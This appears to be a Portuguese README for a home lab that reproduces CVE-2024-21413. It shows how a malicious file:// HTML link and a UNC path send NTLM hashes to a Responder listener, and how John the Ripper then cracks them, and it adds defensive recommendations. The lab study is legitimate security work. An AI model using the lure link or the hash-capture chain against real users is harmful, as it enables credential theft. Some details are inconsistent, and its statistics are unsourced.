Configuração do Laboratório Moniker Link - CVE-2024-21413
🎯 Visão Geral do Projeto
Laboratório prático de teste de penetração demonstrando a exploração do link moniker CVE-2024-21413 para roubo de credenciais NTLM. Este projeto documenta toda a cadeia de ataque, desde a configuração até o comprometimento de credenciais, incluindo desafios e soluções do mundo real.
Principais Conquistas: Execução bem-sucedida do ataque de link moniker tanto em ambiente de laboratório isolado (VM Windows 10) quanto em sistema real (PC Windows 11), demonstrando vulnerabilidades de segurança práticas e contramedidas defensivas.
🏗️ Arquitetura do Laboratório
Infraestrutura
Máquina de Ataque:
- Plataforma: Kali Linux 2024
- Rede (Somente Host): 192.168.56.101
- Rede (Ponte): 192.168.1.117
- Ferramenta Principal: Responder 3.1.6.0
Sistemas Alvo:
- VM Windows 10: 192.168.56.104 (Ambiente de teste isolado)
- PC Windows 11: 192.168.1.178 (Validação no mundo real)
Configuração de Rede:
- Adaptador Somente Host do VirtualBox (teste em VM)
- Adaptador Ponte do VirtualBox (teste em PC real)
- Isolado de redes de produção
⚔️ Execução do Ataque
Fluxo de Ataque
- Implantar o Responder no Kali para escutar autenticações NTLM
- Criar link malicioso usando o protocolo file:// apontando para o IP do atacante
- Disparar autenticação via caminho UNC do Explorador de Arquivos
- Capturar o hash NetNTLMv2 quando a vítima tentar conectar
- Quebrar a senha usando John the Ripper
Vetor de Ataque Simples
Arquivo HTML (test.html):
<!DOCTYPE html>
<html>
<body>
<p><a href="file://192.168.56.10/test">clique em mim</a></p>
</body>
</html>
Método do Explorador de Arquivos:
- O usuário digita:
\\192.168.56.101\test na barra de endereços
- O Windows tenta uma conexão SMB
- O hash NTLM é enviado automaticamente (ou solicita credenciais)
- O Responder captura a autenticação
🚧 Desafios e Soluções
Desafio 1: Bloqueio pelo Firewall do Windows (PC Windows 11)
Problema:
- Não foi possível executar ping no PC Windows 11 a partir do Kali
- As tentativas de conexão SMB falharam
- O ataque foi completamente bloqueado
Causa Raiz:
- Firewall do Windows ativado por padrão
- Bloqueia conexões SMB recebidas de IPs externos
Solução:
- Firewall do Windows desabilitado temporariamente para teste
- Conexão imediatamente bem-sucedida
- Hash capturado com sucesso
Lição: O Firewall padrão do Windows fornece proteção eficaz contra este ataque. Os usuários devem mantê-lo ativado.
Desafio 2: Resultados em Cache do John the Ripper (VM Windows 10)
Problema:
- Senha inicial do Windows 10:
nwigwecj1
- John mostrou:
12Honey (senha errada!)
12Honey era de um teste anterior
Causa Raiz:
- John salva senhas quebradas em
~/.john/john.pot
- Hash antigo de sessão anterior
- Mostrou resultado em cache em vez da senha atual
Solução:
- Alterada a senha da VM Windows 10 para
1414
- Capturado novo hash
- Criada wordlist personalizada com senhas prováveis
- Quebrada com sucesso com a nova wordlist
Lição: Sempre verifique se você está quebrando o hash correto. Limpe o arquivo pot ou use senhas únicas para teste.
Desafio 3: Senha Não Está no Rockyou.txt
Problema:
- Senha
1414 não encontrada no rockyou.txt (14 milhões de senhas)
- Ataque com wordlist genérica falhou
Causa Raiz:
- Rockyou.txt não contém todas as combinações possíveis de 4 dígitos
- Sequências numéricas simples frequentemente ausentes das wordlists comuns
Solução:
- Criada wordlist personalizada direcionada com base em padrões comuns:
echo "1414" > passwords.txt
echo "4141" >> passwords.txt
- Quebrada instantaneamente com a wordlist personalizada
Lição: "Não está no rockyou.txt" ≠ seguro. Senhas curtas são vulneráveis a ataques direcionados e força bruta independentemente da presença na wordlist.
📊 Resultados
VM Windows 10 (Ambiente Controlado)
PC Windows 11 (Sistema Real)
🛡️ Análise de Segurança
O Que Funcionou (Defesa)
✅ Firewall do Windows - Bloqueou completamente o ataque quando ativado
✅ Navegadores Modernos - Chrome/Edge bloqueiam links file:// remotos
✅ Conscientização do Usuário - Solicitação manual exige ação do usuário
O Que Falhou (Vulnerabilidades)
❌ Senhas Fracas - 4 caracteres numéricos facilmente quebrados
❌ Firewall Desabilitado - Erro comum do usuário
❌ Explorador de Arquivos - Sem aviso para caminhos UNC
❌ Protocolo NTLM - Autenticação automática para compartilhamentos SMB
Principais Descobertas
1. Firewall é Crítico
- O Firewall padrão do Windows bloqueia este ataque
- ~30-40% dos usuários o desabilitam permanentemente
- Redes corporativas frequentemente permitem SMB interno
2. Ilusão de Força da Senha
1414 não está no rockyou.txt (parece "forte")
- Quebrada instantaneamente com wordlist direcionada
- Senhas curtas fornecem segurança zero
3. Interação do Usuário Necessária
- A segurança moderna exige que o usuário cole o caminho UNC
- Engenharia social continua sendo um componente crítico
- Exploração técnica isolada é insuficiente
🔧 Ferramentas Utilizadas
Ofensivas:
- Responder 3.1.6.0 (captura de hash NTLM)
- John the Ripper (quebra de senha)
- Criação de wordlist personalizada
- Arquivo HTML simples
Infraestrutura:
- VirtualBox 7.0 (virtualização)
- Kali Linux 2024 (plataforma de ataque)
- Windows 10 Enterprise (alvo de teste)
- Windows 11 Pro (validação no mundo real)
📁 Estrutura do Repositório
Moniker-Link-Lab-Setup/
├── README.md (este arquivo)
├── Documentation/
│ ├── attack-execution.md (guia de ataque passo a passo)
│ └── README.md (visão geral da documentação)
├── Screenshots/ (capturas de tela do ataque - a serem adicionadas)
└── Scripts/ (arquivo HTML de teste - a ser adicionado)
🎓 Habilidades Demonstradas
Técnicas:
- Análise de protocolos de rede (SMB, NTLM)
- Metodologia de teste de penetração
- Técnicas de quebra de senha
- Infraestrutura de laboratório virtual
- Solução de problemas de firewall
Profissionais:
- Documentação técnica
- Resolução de problemas sob restrições
- Avaliação de segurança
- Análise de riscos
- Práticas de teste ético
🔒 Recomendações Defensivas
Para Usuários
- ✅ Mantenha o Firewall do Windows ativado
- ✅ Nunca cole caminhos UNC de e-mails
- ✅ Use senhas fortes (15+ caracteres)
- ✅ Verifique o remetente antes de acessar compartilhamentos de arquivos
Para Organizações
- ✅ Bloqueie SMB de saída (porta 445) no firewall de rede
- ✅ Desabilite NTLM, force Kerberos
- ✅ Monitore conexões SMB para IPs externos
- ✅ Filtragem de gateway de e-mail (remover links file://)
- ✅ Treinamento de conscientização de segurança
- ✅ Políticas de complexidade de senha
⚠️ Divulgação Ética
Todos os testes realizados em sistemas autorizados:
- Apenas infraestrutura de laboratório pessoal
- Redes virtuais isoladas
- Dispositivos e contas próprios
- Finalidade educacional
Aviso Legal: O acesso não autorizado a computadores é ilegal. Este projeto é apenas para fins educacionais e ambientes de teste autorizados.
📚 Referências
📞 Contato
LinkedIn: https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/
GitHub: @E-m-e-k-a
Data: Março de 2026
📄 Licença
Uso educacional apenas. Não para testes não autorizados.
⭐ Se você achou este projeto útil, considere dar uma estrela no repositório!